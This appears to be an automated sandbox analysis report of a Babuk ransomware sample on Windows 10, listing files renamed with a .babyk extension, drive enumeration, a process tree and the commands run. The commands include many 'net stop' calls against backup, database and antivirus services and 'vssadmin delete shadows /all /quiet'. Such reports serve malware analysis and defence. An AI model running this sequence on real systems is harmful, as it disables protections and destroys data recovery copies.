memory/296-116-0x0000000000000000-mapping.dmp

memory/2020-117-0x0000000000000000-mapping.dmp

memory/1944-118-0x0000000000000000-mapping.dmp

memory/1984-119-0x0000000000000000-mapping.dmp

memory/1144-120-0x0000000000000000-mapping.dmp

memory/1656-121-0x0000000000000000-mapping.dmp

memory/1768-122-0x0000000000000000-mapping.dmp

memory/1820-123-0x0000000000000000-mapping.dmp

memory/1600-124-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-04-20 13:37

Reported

2021-04-20 13:39

Platform

win10v20210408

Max time kernel

87s

Max time network

111s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\SplitRedo.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\CopyReset.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\MergeUnregister.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\ResolveRegister.tif => C:\Users\Admin\Pictures\ResolveRegister.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\StopEdit.raw => C:\Users\Admin\Pictures\StopEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\SplitRedo.png => C:\Users\Admin\Pictures\SplitRedo.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\BlockConvert.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\CopyReset.raw => C:\Users\Admin\Pictures\CopyReset.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\RestartEdit.raw => C:\Users\Admin\Pictures\RestartEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\StopEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\BlockConvert.png => C:\Users\Admin\Pictures\BlockConvert.png.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\JoinOut.tif => C:\Users\Admin\Pictures\JoinOut.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\JoinOut.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResolveRegister.tif.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\RestartEdit.raw.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteDisconnect.tiff => C:\Users\Admin\Pictures\CompleteDisconnect.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened for modification C:\Users\Admin\Pictures\CompleteDisconnect.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File renamed C:\Users\Admin\Pictures\MergeUnregister.tiff => C:\Users\Admin\Pictures\MergeUnregister.tiff.babyk C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 860 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 1964 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 1964 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2072 wrote to memory of 3248 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2072 wrote to memory of 3248 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 2840 wrote to memory of 512 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2840 wrote to memory of 512 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 512 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 512 wrote to memory of 1880 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 200 wrote to memory of 940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 200 wrote to memory of 940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 940 wrote to memory of 2304 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 940 wrote to memory of 2304 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 3992 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 3992 wrote to memory of 3396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3992 wrote to memory of 3396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3396 wrote to memory of 3648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3396 wrote to memory of 3648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 1316 wrote to memory of 2124 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 1316 wrote to memory of 2124 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2124 wrote to memory of 2144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2124 wrote to memory of 2144 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 2236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 912 wrote to memory of 3920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 912 wrote to memory of 3920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 3368 wrote to memory of 1788 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3368 wrote to memory of 1788 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 1788 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1788 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 3956 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3956 wrote to memory of 2072 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2072 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 580 wrote to memory of 416 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 580 wrote to memory of 416 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 416 wrote to memory of 2844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 416 wrote to memory of 2844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 188 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 188 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 188 wrote to memory of 2404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 188 wrote to memory of 2404 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2404 wrote to memory of 184 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2404 wrote to memory of 184 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 860 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 860 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe C:\Windows\SYSTEM32\cmd.exe
PID 740 wrote to memory of 2804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 740 wrote to memory of 2804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe

"C:\Users\Admin\AppData\Local\Temp\ed0f154481261e9a08dcc4f7e4d396bce75526811216106daa70d4148c660d76.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop mssqlserver /y

C:\Windows\system32\net.exe

net stop mssqlserver /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mssqlserver /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop vss /y

C:\Windows\system32\net.exe

net stop vss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop vss /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop sql /y

C:\Windows\system32\net.exe

net stop sql /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sql /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop svc$ /y

C:\Windows\system32\net.exe

net stop svc$ /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop svc$ /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop memtas /y

C:\Windows\system32\net.exe

net stop memtas /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop memtas /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop mepocs /y

C:\Windows\system32\net.exe

net stop mepocs /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop mepocs /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop backup /y

C:\Windows\system32\net.exe

net stop backup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop backup /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxVss /y

C:\Windows\system32\net.exe

net stop GxVss /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxVss /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxBlr /y

C:\Windows\system32\net.exe

net stop GxBlr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxBlr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxFWD /y

C:\Windows\system32\net.exe

net stop GxFWD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxFWD /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxCVD /y

C:\Windows\system32\net.exe

net stop GxCVD /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCVD /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GxCIMgr /y

C:\Windows\system32\net.exe

net stop GxCIMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GxCIMgr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop DefWatch /y

C:\Windows\system32\net.exe

net stop DefWatch /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop DefWatch /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop ccEvtMgr /y

C:\Windows\system32\net.exe

net stop ccEvtMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccEvtMgr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop ccSetMgr /y

C:\Windows\system32\net.exe

net stop ccSetMgr /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop ccSetMgr /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop SavRoam /y

C:\Windows\system32\net.exe

net stop SavRoam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SavRoam /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop RTVscan /y

C:\Windows\system32\net.exe

net stop RTVscan /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop RTVscan /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop QBFCService /y

C:\Windows\system32\net.exe

net stop QBFCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBFCService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop QBIDPService /y

C:\Windows\system32\net.exe

net stop QBIDPService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBIDPService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net.exe

net stop Intuit.QuickBooks.FCS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop QBCFMonitorService /y

C:\Windows\system32\net.exe

net stop QBCFMonitorService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop QBCFMonitorService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop YooBackup /y

C:\Windows\system32\net.exe

net stop YooBackup /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooBackup /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop YooIT /y

C:\Windows\system32\net.exe

net stop YooIT /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop YooIT /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop zhudongfangyu /y

C:\Windows\system32\net.exe

net stop zhudongfangyu /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop zhudongfangyu /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop sophos /y

C:\Windows\system32\net.exe

net stop sophos /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sophos /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop stc_raw_agent /y

C:\Windows\system32\net.exe

net stop stc_raw_agent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop stc_raw_agent /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VSNAPVSS /y

C:\Windows\system32\net.exe

net stop VSNAPVSS /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VSNAPVSS /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\system32\net.exe

net stop VeeamTransportSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\system32\net.exe

net stop VeeamDeploymentService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\system32\net.exe

net stop VeeamNFSSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop veeam /y

C:\Windows\system32\net.exe

net stop veeam /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop veeam /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\system32\net.exe

net stop PDVFSService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\system32\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\system32\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net.exe

net stop BackupExecDiveciMediaService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\system32\net.exe

net stop BackupExecJobEngine /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\system32\net.exe

net stop BackupExecManagementService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\system32\net.exe

net stop BackupExecRPCService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\system32\net.exe

net stop AcrSch2Svc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\system32\net.exe

net stop AcronisAgent /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop CASAD2DWebSvc /y

C:\Windows\system32\net.exe

net stop CASAD2DWebSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CASAD2DWebSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop CAARCUpdateSvc /y

C:\Windows\system32\net.exe

net stop CAARCUpdateSvc /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop CAARCUpdateSvc /y

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c net stop GoogleChromeElevationService /y

C:\Windows\system32\net.exe

net stop GoogleChromeElevationService /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop GoogleChromeElevationService /y

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

memory/1964-114-0x0000000000000000-mapping.dmp

memory/2072-115-0x0000000000000000-mapping.dmp

memory/3248-116-0x0000000000000000-mapping.dmp

memory/2840-117-0x0000000000000000-mapping.dmp

memory/512-118-0x0000000000000000-mapping.dmp

memory/1880-119-0x0000000000000000-mapping.dmp

memory/200-120-0x0000000000000000-mapping.dmp

